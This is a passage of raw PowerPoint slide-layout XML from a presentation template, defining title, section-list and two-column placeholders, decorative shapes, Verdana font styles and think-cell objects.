      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Rectangle 9"/>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="11297211" y="6356350"/>
            <a:ext cx="18489" cy="365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a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="742950" y="365125"/>
            <a:ext cx="10906651" cy="775597"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr sz="2800"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Click to edit </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Master title style</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="Rectangle 16"/>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="516253" y="365125"/>
            <a:ext cx="91440" cy="775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84886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rgbClr val="292929"/>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34588512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367" name="think-cell Slide" r:id="rId5" imgW="425" imgH="426" progId="TCLayout.ActiveDocument.1">
                  <p:embed/>
                </p:oleObj>
              </mc:Choice>
              <mc:Fallback>
                <p:oleObj name="think-cell Slide" r:id="rId5" imgW="425" imgH="426" progId="TCLayout.ActiveDocument.1">
                  <p:embed/>
                  <p:pic>
                    <p:nvPicPr>
                      <p:cNvPr id="8" name="Objec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US" sz="4800" b="0" i="0" baseline="0" dirty="0">
              <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              <a:ea typeface="+mj-ea"/>
              <a:cs typeface="+mj-cs"/>
              <a:sym typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>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2C497C3-2394-46DE-BCAE-0200D95F1DF4}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Picture 8"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr userDrawn="1"/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId7"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="516253" y="6356509"/>
            <a:ext cx="1694326" cy="364965"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="Rectangle 13"/>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="11297211" y="6356350"/>
            <a:ext cx="1848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2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr userDrawn="1">
            <p:ph type="body" idx="13" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1196589" y="642736"/>
            <a:ext cx="679673" cy="492443"/>
          </a:xfrm>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="ctr">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:defRPr sz="3200" cap="all" baseline="0">
                <a:solidFill>
                  <a:srgbClr val="9E2D2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Tit</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="Text Placeholder 21"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr userDrawn="1">
            <p:ph type="body" sz="quarter" idx="14" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="516253" y="1983226"/>
            <a:ext cx="10438041" cy="3962400"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="457200" indent="-457200">
              <a:buNone/>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>01	Section A</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>02	Section B</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>03	Section C</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>04	Section D</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>05	Section E</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>06	Section F</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>07	Section G</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="28857824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292929"/>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3546416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320" name="think-cell Slide" r:id="rId5" imgW="425" imgH="426" progId="TCLayout.ActiveDocument.1">
                  <p:embed/>
                </p:oleObj>
              </mc:Choice>
              <mc:Fallback>
                <p:oleObj name="think-cell Slide" r:id="rId5" imgW="425" imgH="426" progId="TCLayout.ActiveDocument.1">
                  <p:embed/>
                  <p:pic>
                    <p:nvPicPr>
                      <p:cNvPr id="8" name="Objec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US" sz="4800" b="0" i="0" baseline="0" dirty="0">
              <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              <a:ea typeface="+mj-ea"/>
              <a:cs typeface="+mj-cs"/>
              <a:sym typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>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2C497C3-2394-46DE-BCAE-0200D95F1DF4}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="Rectangle 13"/>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="11297211" y="6356350"/>
            <a:ext cx="1848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980703"/>
            <a:ext cx="10515600" cy="1137442"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="l">
              <a:defRPr sz="4800">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Click to edit Master title style</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="22" name="Picture 21"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr userDrawn="1"/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId7"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="516253" y="6356509"/>
            <a:ext cx="1694326" cy="364965"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="148964860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2"/>
            </p:custDataLst>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="29132205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2" name="think-cell Slide" r:id="rId5" imgW="425" imgH="426" progId="TCLayout.ActiveDocument.1">
                  <p:embed/>
                </p:oleObj>
              </mc:Choice>
              <mc:Fallback>
                <p:oleObj name="think-cell Slide" r:id="rId5" imgW="425" imgH="42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US" sz="2800" b="0" i="0" baseline="0" dirty="0">
              <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              <a:ea typeface="+mj-ea"/>
              <a:cs typeface="+mj-cs"/>
              <a:sym typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="half" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="516253" y="1600200"/>
            <a:ext cx="5303520" cy="4576763"/>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355080" y="1600200"/>
            <a:ext cx="5303520" cy="4576763"/>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CD0B8607-581D-4DCD-8CF6-752BF3D90713}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>5/15/2020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C497C3-2394-46DE-BCAE-0200D95F1DF4}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Rectangle 11"/>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="11297211" y="6356350"/>
            <a:ext cx="18489" cy="365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a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="742950" y="365125"/>
            <a:ext cx="10915650" cy="775597"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr sz="2800"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Click to edit </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Master title style</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22" name="Rectangle 21"/>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="516253" y="365125"/>
            <a:ext cx="91440" cy="775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562946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2"/>
            </p:custDataLst>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="624777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433" name="think-cell Slide" r:id="rId5" imgW="425" imgH="426" progId="TCLayout.ActiveDocument.1">
                  <p:embed/>
                </p:oleObj>
              </mc:Choice>
              <mc:Fallback>
                <p:oleObj name="think-cell Slide" r:id="rId5" imgW="425" imgH="426" progId="TCLayout.ActiveDocument.1">
                  <p:embed/>
                  <p:pic>
                    <p:nvPicPr>
                      <p:cNvPr id="9" name="Object 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US" sz="2800" b="0" i="0" baseline="0" dirty="0">
              <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              <a:ea typeface="+mj-ea"/>
              <a:cs typeface="+mj-cs"/>
              <a:sym typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="Text Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AEDA7C7D-6B5F-4256-AFCA-98176A78F0EB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="14"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="516253" y="1865314"/>
            <a:ext cx="5376328" cy="3944936"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1">
              <a:lumMod val="95000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="91440" rIns="91440" bIns="91440" rtlCol="0">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr lang="en-US" dirty="0"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0">
              <a:buClr>
                <a:schemeClr val="accent1"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Edit Master text styles</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buClr>
                <a:schemeClr val="accent1"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Second level</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:buClr>
                <a:schemeClr val="accent1"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Third level</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3">
              <a:buClr>
                <a:schemeClr val="accent1"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Fourth level</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="4">
              <a:buClr>
                <a:schemeClr val="accent1"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Fifth level</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="Text Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{760A5078-F15A-4D28-9382-E92B1D5FED23}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="17"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6273273" y="1865942"/>
            <a:ext cx="5376328" cy="3944308"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1">
              <a:lumMod val="95000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="91440" rIns="91440" bIns="91440" rtlCol="0">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr lang="en-US" dirty="0"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0">
              <a:buClr>
                <a:schemeClr val="accent1"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Edit Master text styles</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buClr>
                <a:schemeClr val="accent1"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Second level</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:buClr>
                <a:schemeClr val="accent1"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Third level</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3">
              <a:buClr>
                <a:schemeClr val="accent1"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Fourth level</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="4">
              <a:buClr>
                <a:schemeClr val="accent1"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Fifth level</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="Text Placeholder 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E4F43A21-80C9-469A-A11C-05CF6A057552}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="16"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="516253" y="1317625"/>
            <a:ext cx="5374426" cy="547688"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent1"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91440" tIns="91440" rIns="91440" bIns="91440" anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:buNone/>
              <a:defRPr kumimoji="0" lang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike" kern="0" cap="all" spc="0" normalizeH="0" baseline="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Verdana"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Edit Master text styles</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="Text Placeholder 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0D7293F2-68E9-4ED8-9DFD-D39C8CE0AAE9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="18"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6275175" y="1317625"/>
            <a:ext cx="5374426" cy="547688"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent2"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91440" tIns="91440" rIns="91440" bIns="91440" anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:buNone/>
              <a:defRPr kumimoji="0" lang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike" kern="0" cap="all" spc="0" normalizeH="0" baseline="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Verdana"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Edit Master text styles</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="Text Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3D2624CF-7C3A-4B31-A0EF-76250F5F7193}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="19" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="4948622" y="1865313"/>
            <a:ext cx="658812" cy="547688"/>
          </a:xfrm>
          <a:prstGeom prst="triangle">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent1"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:buNone/>
              <a:defRPr sz="800">
                <a:solidFill>
                  <a:srgbClr val="4C8C33"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="Text Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DC886314-ECF8-41D5-8889-16B1D745EFBC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="20" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="10725579" y="1865313"/>
            <a:ext cx="658812" cy="547688"/>
          </a:xfrm>
          <a:prstGeom prst="triangle">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent2"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:buNone/>
              <a:defRPr sz="800">
                <a:solidFill>
                  <a:srgbClr val="71A100"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Date Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{3B2C8CDA-41B3-4759-9EBB-06DFE711A101}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>5/15/2020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C497C3-2394-46DE-BCAE-0200D95F1DF4}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Rectangle 11"/>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="11297211" y="6356350"/>
            <a:ext cx="18489" cy="365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a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="742950" y="365125"/>
            <a:ext cx="10915650" cy="775597"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr sz="2800"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Click to edit </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Master title style</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="Rectangle 22"/>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="516253" y="365125"/>
            <a:ext cx="91440" cy="775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721447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2"/>
            </p:custDataLst>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="15093414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79" name="think-cell Slide" r:id="rId5" imgW="425" imgH="426" progId="TCLayout.ActiveDocument.1">
                  <p:embed/>
                </p:oleObj>
              </mc:Choice>
              <mc:Fallback>
                <p:oleObj name="think-cell Slide" r:id="rId5" imgW="425" imgH="426" progId="TCLayout.ActiveDocument.1">
                  <p:embed/>
                  <p:pic>
                    <p:nvPicPr>
                      <p:cNvPr id="9" name="Object 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US" sz="2800" b="0" i="0" baseline="0" dirty="0">
              <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              <a:ea typeface="+mj-ea"/>
              <a:cs typeface="+mj-cs"/>
